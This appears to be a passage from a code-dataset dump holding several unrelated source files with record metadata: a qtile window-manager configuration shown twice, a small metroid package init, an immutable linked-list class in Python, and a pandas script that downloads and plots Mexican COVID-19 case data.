window_to_previous_screen(_qtile): _screen_index = _qtile.screens.index(_qtile.current_screen) if _screen_index != 0: _group = _qtile.screens[_screen_index - 1].group.name _qtile.current_window.togroup(_group) _qtile.focus_screen(_screen_index - 1) def window_to_next_screen(_qtile): _screen_index = _qtile.screens.index(_qtile.current_screen) if _screen_index + 1 != len(_qtile.screens): _group = _qtile.screens[_screen_index + 1].group.name _qtile.current_window.togroup(_group) _qtile.focus_screen(_screen_index + 1) mod = "mod4" terminal = "terminator" keys = [ # Switch between windows Key([mod], "h", lazy.layout.left(), desc="Move focus to left"), Key([mod], "l", lazy.layout.right(), desc="Move focus to right"), Key([mod], "j", lazy.layout.down(), desc="Move focus down"), Key([mod], "k", lazy.layout.up(), desc="Move focus up"), Key(["mod1"], "Tab", lazy.layout.next(), desc="Move window focus to other window"), # Move windows between left/right columns or move up/down in current stack. # Moving out of range in Columns layout will create new column. Key([mod, "shift"], "h", lazy.layout.shuffle_left(), desc="Move window to the left"), Key([mod, "shift"], "l", lazy.layout.shuffle_right(), desc="Move window to the right"), Key([mod, "shift"], "j", lazy.layout.shuffle_down(), desc="Move window down"), Key([mod, "shift"], "k", lazy.layout.shuffle_up(), desc="Move window up"), Key([mod], "Left", lazy.layout.shuffle_left(), desc="Move window to the left"), Key([mod], "Right", lazy.layout.shuffle_right(), desc="Move window to the right"), Key([mod], "Up", lazy.layout.shuffle_up(), desc="Move window up"), Key([mod], "Down", lazy.layout.shuffle_down(), desc="Move window down"), # Grow windows. If current window is on the edge of screen and direction # will be to screen edge - window would shrink. Key([mod, "control"], "h", lazy.layout.grow_left(), desc="Grow window to the left"), Key([mod, "control"], "l", lazy.layout.grow_right(), desc="Grow window to the right"), Key([mod, "control"], "j", lazy.layout.grow_down(), desc="Grow window down"), Key([mod, "control"], "k", lazy.layout.grow_up(), desc="Grow window up"), # xmonadtall Key([mod, "control"], "h", lazy.layout.shrink(), desc="Shrink window"), Key([mod, "control"], "l", lazy.layout.grow(), desc="Grow window"), Key([mod, "control"], "j", lazy.layout.shrink(), desc="Shrink window"), Key([mod, "control"], "k", lazy.layout.grow(), desc="Grow window"), Key([mod], "n", lazy.layout.normalize(), desc="Reset all window sizes"), Key([mod, "control"], "space", lazy.window.toggle_floating(), desc="Toggle floating"), # Switch between monitors Key([mod, "shift"], "Left", lazy.function(window_to_next_screen), desc="Move window to the next monitor"), Key([mod, "shift"], "Right", lazy.function(window_to_previous_screen), desc="Move window to the previous monitor"), # Toggle between split and unsplit sides of stack. # Split = all windows displayed # Unsplit = 1 window displayed, like Max layout, but still with # multiple stack panes Key([mod, "shift"], "Return", lazy.layout.toggle_split(), desc="Toggle between split and unsplit sides of stack"), Key([mod], "t", lazy.spawn(terminal), desc="Launch terminal"), # Toggle between different layouts as defined below Key([mod], "Tab", lazy.next_layout(), desc="Toggle between layouts"), Key(["mod1"], "F4", lazy.window.kill(), desc="Kill focused window"), Key([mod, "control"], "r", lazy.restart(), desc="Restart Qtile"), Key(["control", 'mod1'], 'Delete', lazy.shutdown(), desc="Shutdown Qtile"), Key([mod], "r", lazy.spawncmd(), desc="Spawn a command using a prompt widget"), # Control Qtile Key([mod], 'semicolon', lazy.spawn('lock'), desc="Lock Qtile"), Key([mod], 'd', lazy.screen.toggle_group('Desktop'), desc="Show Desktop"), Key(["control", "shift"], "Escape", lazy.spawn("gnome-system-monitor"), desc="Launch system monitor"), # Launch applications Key(["control"], "space", lazy.spawn("dmenu_run", shell=True), desc="Launch dmenu"), Key([mod], "e", lazy.spawn("nautilus"), desc="Launch nautilus"), Key([mod], "b", lazy.spawn("google-chrome"), desc="Launch google chrome"), Key([mod], "KP_Left", lazy.spawn("netease-cloud-music"), desc="Launch netease cloud music"), # Just for test Key([mod], "a", lazy.group['Desktop'].toscreen(0)) ] _group_names = [ ("Major", {'layout': ['xmonadtall', 'max']}), ("Minor", {'layout': ['columns', 'max']}), ("Desktop", {'layout': 'columns'}) ] groups = [Group(name, **kwargs) for name, kwargs in _group_names] for i, (name, kwargs) in enumerate(_group_names, 1): keys.append(Key([mod], str(i), lazy.group[name].toscreen())) # Switch to another group keys.append(Key([mod, "shift"], str(i), lazy.window.togroup( name))) # Send current window to another group _layout_theme = { "border_width": 1, "margin": 5, "border_focus": "#ff66cc", "border_normal": "#66ccff" } layouts = [ layout.MonadTall( align=1, **_layout_theme ), layout.Max(), layout.Columns( # fair=True, insert_position=1, **_layout_theme ), # layout.Bsp( # grow_amount=2, # **_layout_theme # ), # Try more layouts by unleashing below layouts. # layout.Tile(), # layout.Stack(num_stacks=2), # layout.Slice(), # layout.Matrix(), # layout.MonadWide(), # layout.RatioTile(), # layout.TreeTab(), # layout.VerticalTile(), # layout.Zoomy(), ] colors = [["#282c34", "#282c34"], # panel background ["#434758", "#434758"], # background for current screen tab ["#ffffff", "#ffffff"], # font color for group names ["#ff5555", "#ff5555"], # border line color for current tab ["#8d62a9", "#8d62a9"], # border line color for other tab and odd widgets ["#668bd7", "#668bd7"], # color for the even widgets ["#e1acff", "#e1acff"]] # window name widget_defaults = dict( font='sans', fontsize=12, padding=3, ) extension_defaults = widget_defaults.copy() screens = [ Screen( top=bar.Bar( [ widget.CurrentLayout(), widget.GroupBox(), widget.WindowName(), ], 24 ), ), Screen( top=bar.Bar( [ widget.Sep( linewidth=0, padding=6, foreground=colors[2], background=colors[0] ), widget.Image( filename="~/.config/qtile/logo.png", mouse_callbacks={ "Button1": lambda: qtile.cmd_spawn("dmenu_run")} ), widget.CurrentLayout(), widget.GroupBox(), # widget.Prompt(), widget.WindowName(), # widget.Chord( # chords_colors={ # 'launch': ("#ff0000", "#ffffff"), # }, # name_transform=lambda name: name.upper(), # ), widget.TextBox( "Welcome, ariseus.", foreground="#ff66cc", mouse_callbacks={"Button1": lambda: qtile.cmd_spawn("waw")} ), widget.TextBox( text=" 🌡", padding=2, fontsize=11 ), widget.ThermalSensor( threshold=90, padding=5 ), widget.TextBox( text=" 🖬", padding=0, fontsize=14 ), widget.Memory( mouse_callbacks={'Button1': lambda: qtile.cmd_spawn( terminal + ' -e bashtop')}, measure_mem='G', padding=5 ), widget.TextBox( text='Network:', ), widget.Net( interface="enp6s0", format='{down} ↓↑ {up}' ), # widget.TextBox( # text=" Vol:", # padding=0 # ), # widget.Volume( # padding=5 # ), widget.Systray(), widget.Clock(format='%Y/%m/%d %a %I:%M %p'), # widget.QuickExit(), ], 24, ), ), ] # Drag floating layouts. mouse = [ Drag([mod], "Button1", lazy.window.set_position_floating(), start=lazy.window.get_position()), # Drag([mod], "Button3", lazy.window.set_size_floating(), # start=lazy.window.get_size()), # Click([mod], "Button2", lazy.window.bring_to_front()) ] dgroups_key_binder = None dgroups_app_rules = [] # type: List main = None # WARNING: this is deprecated and will be removed soon follow_mouse_focus = False bring_front_click = False cursor_warp = False floating_layout = layout.Floating(float_rules=[ # Run the utility of `xprop` to see the wm class and name of an X client. *layout.Floating.default_float_rules, Match(wm_class='confirmreset'), # gitk Match(wm_class='makebranch'), # gitk Match(wm_class='maketag'), # gitk Match(wm_class='ssh-askpass'), # ssh-askpass Match(title='branchdialog'), # gitk Match(title='pinentry'), # GPG key password entry ]) auto_fullscreen = True focus_on_window_activation = "smart" # XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this # string besides java UI toolkits; you can see several discussions on the # mailing lists, GitHub issues, and other WM documentation that suggest setting # this string if your java app doesn't work correctly. We may as well just lie # and say that we're a working one by default. # # We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in # java that happens to be on java's whitelist. wmname = "LG3D" @hook.subscribe.startup_once def start_once(): _home = os.path.expanduser('~') subprocess.call([_home + '/.config/autostart.sh']) @hook.subscribe.startup_complete def start(): lazy.group['Major'].toscreen(1)
<filename>.config/qtile/config.py # Copyright (c) 2010 <NAME> # Copyright (c) 2010, 2014 dequis # Copyright (c) 2012 <NAME> # Copyright (c) 2012-2014 <NAME> # Copyright (c) 2012 <NAME> # Copyright (c) 2013 horsik # Copyright (c) 2013 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from typing import List # noqa: F401 from libqtile import bar, layout, widget, qtile, hook from libqtile.config import Click, Drag, Group, Key, Match, Screen from libqtile.lazy import lazy import os import subprocess def window_to_previous_screen(_qtile): _screen_index = _qtile.screens.index(_qtile.current_screen) if _screen_index != 0: _group = _qtile.screens[_screen_index - 1].group.name _qtile.current_window.togroup(_group) _qtile.focus_screen(_screen_index - 1) def window_to_next_screen(_qtile): _screen_index = _qtile.screens.index(_qtile.current_screen) if _screen_index + 1 != len(_qtile.screens): _group = _qtile.screens[_screen_index + 1].group.name _qtile.current_window.togroup(_group) _qtile.focus_screen(_screen_index + 1) mod = "mod4" terminal = "terminator" keys = [ # Switch between windows Key([mod], "h", lazy.layout.left(), desc="Move focus to left"), Key([mod], "l", lazy.layout.right(), desc="Move focus to right"), Key([mod], "j", lazy.layout.down(), desc="Move focus down"), Key([mod], "k", lazy.layout.up(), desc="Move focus up"), Key(["mod1"], "Tab", lazy.layout.next(), desc="Move window focus to other window"), # Move windows between left/right columns or move up/down in current stack. # Moving out of range in Columns layout will create new column. Key([mod, "shift"], "h", lazy.layout.shuffle_left(), desc="Move window to the left"), Key([mod, "shift"], "l", lazy.layout.shuffle_right(), desc="Move window to the right"), Key([mod, "shift"], "j", lazy.layout.shuffle_down(), desc="Move window down"), Key([mod, "shift"], "k", lazy.layout.shuffle_up(), desc="Move window up"), Key([mod], "Left", lazy.layout.shuffle_left(), desc="Move window to the left"), Key([mod], "Right", lazy.layout.shuffle_right(), desc="Move window to the right"), Key([mod], "Up", lazy.layout.shuffle_up(), desc="Move window up"), Key([mod], "Down", lazy.layout.shuffle_down(), desc="Move window down"), # Grow windows. If current window is on the edge of screen and direction # will be to screen edge - window would shrink. Key([mod, "control"], "h", lazy.layout.grow_left(), desc="Grow window to the left"), Key([mod, "control"], "l", lazy.layout.grow_right(), desc="Grow window to the right"), Key([mod, "control"], "j", lazy.layout.grow_down(), desc="Grow window down"), Key([mod, "control"], "k", lazy.layout.grow_up(), desc="Grow window up"), # xmonadtall Key([mod, "control"], "h", lazy.layout.shrink(), desc="Shrink window"), Key([mod, "control"], "l", lazy.layout.grow(), desc="Grow window"), Key([mod, "control"], "j", lazy.layout.shrink(), desc="Shrink window"), Key([mod, "control"], "k", lazy.layout.grow(), desc="Grow window"), Key([mod], "n", lazy.layout.normalize(), desc="Reset all window sizes"), Key([mod, "control"], "space", lazy.window.toggle_floating(), desc="Toggle floating"), # Switch between monitors Key([mod, "shift"], "Left", lazy.function(window_to_next_screen), desc="Move window to the next monitor"), Key([mod, "shift"], "Right", lazy.function(window_to_previous_screen), desc="Move window to the previous monitor"), # Toggle between split and unsplit sides of stack. # Split = all windows displayed # Unsplit = 1 window displayed, like Max layout, but still with # multiple stack panes Key([mod, "shift"], "Return", lazy.layout.toggle_split(), desc="Toggle between split and unsplit sides of stack"), Key([mod], "t", lazy.spawn(terminal), desc="Launch terminal"), # Toggle between different layouts as defined below Key([mod], "Tab", lazy.next_layout(), desc="Toggle between layouts"), Key(["mod1"], "F4", lazy.window.kill(), desc="Kill focused window"), Key([mod, "control"], "r", lazy.restart(), desc="Restart Qtile"), Key(["control", 'mod1'], 'Delete', lazy.shutdown(), desc="Shutdown Qtile"), Key([mod], "r", lazy.spawncmd(), desc="Spawn a command using a prompt widget"), # Control Qtile Key([mod], 'semicolon', lazy.spawn('lock'), desc="Lock Qtile"), Key([mod], 'd', lazy.screen.toggle_group('Desktop'), desc="Show Desktop"), Key(["control", "shift"], "Escape", lazy.spawn("gnome-system-monitor"), desc="Launch system monitor"), # Launch applications Key(["control"], "space", lazy.spawn("dmenu_run", shell=True), desc="Launch dmenu"), Key([mod], "e", lazy.spawn("nautilus"), desc="Launch nautilus"), Key([mod], "b", lazy.spawn("google-chrome"), desc="Launch google chrome"), Key([mod], "KP_Left", lazy.spawn("netease-cloud-music"), desc="Launch netease cloud music"), # Just for test Key([mod], "a", lazy.group['Desktop'].toscreen(0)) ] _group_names = [ ("Major", {'layout': ['xmonadtall', 'max']}), ("Minor", {'layout': ['columns', 'max']}), ("Desktop", {'layout': 'columns'}) ] groups = [Group(name, **kwargs) for name, kwargs in _group_names] for i, (name, kwargs) in enumerate(_group_names, 1): keys.append(Key([mod], str(i), lazy.group[name].toscreen())) # Switch to another group keys.append(Key([mod, "shift"], str(i), lazy.window.togroup( name))) # Send current window to another group _layout_theme = { "border_width": 1, "margin": 5, "border_focus": "#ff66cc", "border_normal": "#66ccff" } layouts = [ layout.MonadTall( align=1, **_layout_theme ), layout.Max(), layout.Columns( # fair=True, insert_position=1, **_layout_theme ), # layout.Bsp( # grow_amount=2, # **_layout_theme # ), # Try more layouts by unleashing below layouts. # layout.Tile(), # layout.Stack(num_stacks=2), # layout.Slice(), # layout.Matrix(), # layout.MonadWide(), # layout.RatioTile(), # layout.TreeTab(), # layout.VerticalTile(), # layout.Zoomy(), ] colors = [["#282c34", "#282c34"], # panel background ["#434758", "#434758"], # background for current screen tab ["#ffffff", "#ffffff"], # font color for group names ["#ff5555", "#ff5555"], # border line color for current tab ["#8d62a9", "#8d62a9"], # border line color for other tab and odd widgets ["#668bd7", "#668bd7"], # color for the even widgets ["#e1acff", "#e1acff"]] # window name widget_defaults = dict( font='sans', fontsize=12, padding=3, ) extension_defaults = widget_defaults.copy() screens = [ Screen( top=bar.Bar( [ widget.CurrentLayout(), widget.GroupBox(), widget.WindowName(), ], 24 ), ), Screen( top=bar.Bar( [ widget.Sep( linewidth=0, padding=6, foreground=colors[2], background=colors[0] ), widget.Image( filename="~/.config/qtile/logo.png", mouse_callbacks={ "Button1": lambda: qtile.cmd_spawn("dmenu_run")} ), widget.CurrentLayout(), widget.GroupBox(), # widget.Prompt(), widget.WindowName(), # widget.Chord( # chords_colors={ # 'launch': ("#ff0000", "#ffffff"), # }, # name_transform=lambda name: name.upper(), # ), widget.TextBox( "Welcome, ariseus.", foreground="#ff66cc", mouse_callbacks={"Button1": lambda: qtile.cmd_spawn("waw")} ), widget.TextBox( text=" 🌡", padding=2, fontsize=11 ), widget.ThermalSensor( threshold=90, padding=5 ), widget.TextBox( text=" 🖬", padding=0, fontsize=14 ), widget.Memory( mouse_callbacks={'Button1': lambda: qtile.cmd_spawn( terminal + ' -e bashtop')}, measure_mem='G', padding=5 ), widget.TextBox( text='Network:', ), widget.Net( interface="enp6s0", format='{down} ↓↑ {up}' ), # widget.TextBox( # text=" Vol:", # padding=0 # ), # widget.Volume( # padding=5 # ), widget.Systray(), widget.Clock(format='%Y/%m/%d %a %I:%M %p'), # widget.QuickExit(), ], 24, ), ), ] # Drag floating layouts. mouse = [ Drag([mod], "Button1", lazy.window.set_position_floating(), start=lazy.window.get_position()), # Drag([mod], "Button3", lazy.window.set_size_floating(), # start=lazy.window.get_size()), # Click([mod], "Button2", lazy.window.bring_to_front()) ] dgroups_key_binder = None dgroups_app_rules = [] # type: List main = None # WARNING: this is deprecated and will be removed soon follow_mouse_focus = False bring_front_click = False cursor_warp = False floating_layout = layout.Floating(float_rules=[ # Run the utility of `xprop` to see the wm class and name of an X client. *layout.Floating.default_float_rules, Match(wm_class='confirmreset'), # gitk Match(wm_class='makebranch'), # gitk Match(wm_class='maketag'), # gitk Match(wm_class='ssh-askpass'), # ssh-askpass Match(title='branchdialog'), # gitk Match(title='pinentry'), # GPG key password entry ]) auto_fullscreen = True focus_on_window_activation = "smart" # XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this # string besides java UI toolkits; you can see several discussions on the # mailing lists, GitHub issues, and other WM documentation that suggest setting # this string if your java app doesn't work correctly. We may as well just lie # and say that we're a working one by default. # # We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in # java that happens to be on java's whitelist. wmname = "LG3D" @hook.subscribe.startup_once def start_once(): _home = os.path.expanduser('~') subprocess.call([_home + '/.config/autostart.sh']) @hook.subscribe.startup_complete def start(): lazy.group['Major'].toscreen(1)
en
0.745192
# Copyright (c) 2010 <NAME> # Copyright (c) 2010, 2014 dequis # Copyright (c) 2012 <NAME> # Copyright (c) 2012-2014 <NAME> # Copyright (c) 2012 <NAME> # Copyright (c) 2013 horsik # Copyright (c) 2013 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # noqa: F401 # Switch between windows # Move windows between left/right columns or move up/down in current stack. # Moving out of range in Columns layout will create new column. # Grow windows. If current window is on the edge of screen and direction # will be to screen edge - window would shrink. # xmonadtall # Switch between monitors # Toggle between split and unsplit sides of stack. # Split = all windows displayed # Unsplit = 1 window displayed, like Max layout, but still with # multiple stack panes # Toggle between different layouts as defined below # Control Qtile # Launch applications # Just for test # Switch to another group # Send current window to another group # fair=True, # layout.Bsp( # grow_amount=2, # **_layout_theme # ), # Try more layouts by unleashing below layouts. # layout.Tile(), # layout.Stack(num_stacks=2), # layout.Slice(), # layout.Matrix(), # layout.MonadWide(), # layout.RatioTile(), # layout.TreeTab(), # layout.VerticalTile(), # layout.Zoomy(), # panel background # background for current screen tab # font color for group names # border line color for current tab # border line color for other tab and odd widgets # color for the even widgets # window name # widget.Prompt(), # widget.Chord( # chords_colors={ # 'launch': ("#ff0000", "#ffffff"), # }, # name_transform=lambda name: name.upper(), # ), # widget.TextBox( # text=" Vol:", # padding=0 # ), # widget.Volume( # padding=5 # ), # widget.QuickExit(), # Drag floating layouts. # Drag([mod], "Button3", lazy.window.set_size_floating(), # start=lazy.window.get_size()), # Click([mod], "Button2", lazy.window.bring_to_front()) # type: List # WARNING: this is deprecated and will be removed soon # Run the utility of `xprop` to see the wm class and name of an X client. # gitk # gitk # gitk # ssh-askpass # gitk # GPG key password entry # XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this # string besides java UI toolkits; you can see several discussions on the # mailing lists, GitHub issues, and other WM documentation that suggest setting # this string if your java app doesn't work correctly. We may as well just lie # and say that we're a working one by default. # # We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in # java that happens to be on java's whitelist.
1.729084
2
metroid/__init__.py
Bryhn-Bjolgerud/metroid
0
6628958
from metroid.config import settings if settings.worker_type == 'celery': from metroid.celery import MetroidTask # noqa F401 from metroid.publish import publish_event # noqa F401 __version__ = '1.1.0' default_app_config = 'metroid.apps.MetroidConfig'
from metroid.config import settings if settings.worker_type == 'celery': from metroid.celery import MetroidTask # noqa F401 from metroid.publish import publish_event # noqa F401 __version__ = '1.1.0' default_app_config = 'metroid.apps.MetroidConfig'
uz
0.389047
# noqa F401 # noqa F401
1.328532
1
src/funky_collections/immutable.py
erinxocon/funky-collections
0
6628959
<gh_stars>0 import collections from typing import Any, Generator, List, Optional, Sequence, Union from .abc import DoublyLinkedList from .nodes import ImmutableListNode class ImmutableFixedList(DoublyLinkedList, collections.abc.Sequence): __slots__ = "_max_len" def __init__(self, max_len: int = 0, seq: Sequence = ()) -> None: if max_len <= 0: raise ValueError("Max lenth must be more than 0") super().__init__() self._head: Optional[ImmutableListNode] = None self._tail: Optional[ImmutableListNode] = None self._max_len = max_len try: for val in seq[0 : self._max_len]: node = ImmutableListNode(val, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 except TypeError: raise TypeError("seq must be a sequence object") @property def max_len(self) -> int: return self._max_len def append_left(self, value: Any) -> None: if self._size < self._max_len: node = ImmutableListNode(value, None, self._head) if self._tail is None: self._tail = node self._head = node self._size += 1 else: raise ValueError("List full!") def append_right(self, value: Any) -> None: if self._size < self._max_len: node = ImmutableListNode(value, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 else: raise ValueError("List full!") def pop_left(self) -> Any: if self._head is None: raise ValueError("List Empty!") node = self._head data = node.data self._head = node.next_node if self._tail is node: self._tail = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def pop_right(self) -> Any: if self._tail is None: raise ValueError("List Empty!") node = self._tail data = node.data self._tail = node.previous_node if self._head is node: self._head = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def __getitem__(self, index: Union[slice, int]) -> Any: if isinstance(index, slice): if index.start == index.stop == index.step: return self else: _slice = index.indices(len(self)) sliced = [self[i] for i in range(*_slice)] return self._from_sequence(max_len=self._max_len, seq=sliced) elif isinstance(index, int): return self.get_node(index).data else: raise TypeError("List index must be int or slice") class ImmutableList(DoublyLinkedList, collections.abc.Sequence): def __init__(self, seq: Sequence = ()) -> None: super().__init__() self._head: Optional[ImmutableListNode] = None self._tail: Optional[ImmutableListNode] = None try: for val in seq: node = ImmutableListNode(val, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 except TypeError: raise TypeError("seq must be a sequence object") def append_left(self, value: Any) -> None: node = ImmutableListNode(value, None, self._head) if self._tail is None: self._tail = node self._head = node self._size += 1 def append_right(self, value: Any) -> None: node = ImmutableListNode(value, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 def pop_left(self) -> Any: if self._head is None: raise ValueError("List Empty!") node = self._head data = node.data self._head = node.next_node if self._tail is node: self._tail = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def pop_right(self) -> Any: if self._tail is None: raise ValueError("List Empty!") node = self._tail data = node.data self._tail = node.previous_node if self._head is node: self._head = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def __getitem__(self, index: Union[slice, int]) -> Any: if isinstance(index, slice): if index.start == index.stop == index.step: return self else: _slice = index.indices(len(self)) sliced = [self[i] for i in range(*_slice)] return self._from_sequence(seq=sliced) elif isinstance(index, int): return self.get_node(index).data else: raise TypeError("List index must be int or slice")
import collections from typing import Any, Generator, List, Optional, Sequence, Union from .abc import DoublyLinkedList from .nodes import ImmutableListNode class ImmutableFixedList(DoublyLinkedList, collections.abc.Sequence): __slots__ = "_max_len" def __init__(self, max_len: int = 0, seq: Sequence = ()) -> None: if max_len <= 0: raise ValueError("Max lenth must be more than 0") super().__init__() self._head: Optional[ImmutableListNode] = None self._tail: Optional[ImmutableListNode] = None self._max_len = max_len try: for val in seq[0 : self._max_len]: node = ImmutableListNode(val, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 except TypeError: raise TypeError("seq must be a sequence object") @property def max_len(self) -> int: return self._max_len def append_left(self, value: Any) -> None: if self._size < self._max_len: node = ImmutableListNode(value, None, self._head) if self._tail is None: self._tail = node self._head = node self._size += 1 else: raise ValueError("List full!") def append_right(self, value: Any) -> None: if self._size < self._max_len: node = ImmutableListNode(value, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 else: raise ValueError("List full!") def pop_left(self) -> Any: if self._head is None: raise ValueError("List Empty!") node = self._head data = node.data self._head = node.next_node if self._tail is node: self._tail = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def pop_right(self) -> Any: if self._tail is None: raise ValueError("List Empty!") node = self._tail data = node.data self._tail = node.previous_node if self._head is node: self._head = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def __getitem__(self, index: Union[slice, int]) -> Any: if isinstance(index, slice): if index.start == index.stop == index.step: return self else: _slice = index.indices(len(self)) sliced = [self[i] for i in range(*_slice)] return self._from_sequence(max_len=self._max_len, seq=sliced) elif isinstance(index, int): return self.get_node(index).data else: raise TypeError("List index must be int or slice") class ImmutableList(DoublyLinkedList, collections.abc.Sequence): def __init__(self, seq: Sequence = ()) -> None: super().__init__() self._head: Optional[ImmutableListNode] = None self._tail: Optional[ImmutableListNode] = None try: for val in seq: node = ImmutableListNode(val, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 except TypeError: raise TypeError("seq must be a sequence object") def append_left(self, value: Any) -> None: node = ImmutableListNode(value, None, self._head) if self._tail is None: self._tail = node self._head = node self._size += 1 def append_right(self, value: Any) -> None: node = ImmutableListNode(value, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 def pop_left(self) -> Any: if self._head is None: raise ValueError("List Empty!") node = self._head data = node.data self._head = node.next_node if self._tail is node: self._tail = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def pop_right(self) -> Any: if self._tail is None: raise ValueError("List Empty!") node = self._tail data = node.data self._tail = node.previous_node if self._head is node: self._head = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def __getitem__(self, index: Union[slice, int]) -> Any: if isinstance(index, slice): if index.start == index.stop == index.step: return self else: _slice = index.indices(len(self)) sliced = [self[i] for i in range(*_slice)] return self._from_sequence(seq=sliced) elif isinstance(index, int): return self.get_node(index).data else: raise TypeError("List index must be int or slice")
none
1
2.946313
3
covid.py
pyclass-jjj/proyectos
0
6628960
import pandas as pd from os import path from datetime import datetime, timedelta class COVID: def __init__(self): self.descarga_datos() self.get_estado() #self.grafica_matplot() self.grafica_plotly() def descarga_datos(self): hoy = datetime.now() - timedelta(1) fecha = hoy.strftime("%Y%m%d") file_confirmados = f'Casos_Diarios_Estado_Nacional_Confirmados_{fecha}.csv' file_defunciones = f'Casos_Diarios_Estado_Nacional_Defunciones_{fecha}.csv' url1 = f'https://datos.covid-19.conacyt.mx/Downloads/Files/{file_confirmados}' url2 = f'https://datos.covid-19.conacyt.mx/Downloads/Files/{file_defunciones}' print(url1) if not path.exists(file_confirmados): df = pd.read_csv(url1) df.to_csv(file_confirmados) print(f'Archivo {file_confirmados} descargado') df = pd.read_csv(url2) df.to_csv(file_defunciones) print(f'Archivo {file_defunciones} descargado') else: print('Archivos previamente descargados') self.df_conf = pd.read_csv(file_confirmados, parse_dates=True) self.df_def = pd.read_csv(file_defunciones, parse_dates=True) def get_estado(self): estados = list(self.df_conf['nombre']) print(estados) estado = input('Seleccione un estado o Nacional (default Nacional): ') if estado is None or estado == '': self.estado = 'Nacional' else: self.estado = estado.upper() df_filtered_conf = self.df_conf.query(f"nombre == '{self.estado}'") self.data_conf = df_filtered_conf.sum()[4:] df_filtered_def = self.df_def.query(f"nombre == '{self.estado}'") self.data_def = df_filtered_def.sum()[4:] def grafica_plotly(self): pd.options.plotting.backend = "plotly" data1 = self.data_conf data2 = self.data_def data = pd.concat([data1, data2], axis=1) fig = data.plot(title=f'Contagios COVID-19 ({self.estado})', template="simple_white", labels=dict(index="Fecha", value="Cantidad", variable="")) fig.data[0].name = 'Contagios' fig.data[1].name = 'Defunciones' fig.show() def grafica_matplot(self): import matplotlib.pyplot as plt data1 = self.data_conf data2 = self.data_def plt.title(f'Contagios COVID-19 ({self.estado})') plt.xlabel(f'Fecha') plt.rc('xtick', labelsize=8) plt.xticks(fontsize=6) plt.xticks(rotation=70) plt.grid(True) plt.ticklabel_format(useOffset=False) ax = data1.plot() data2.plot(ax=ax) plt.show() covid = COVID()
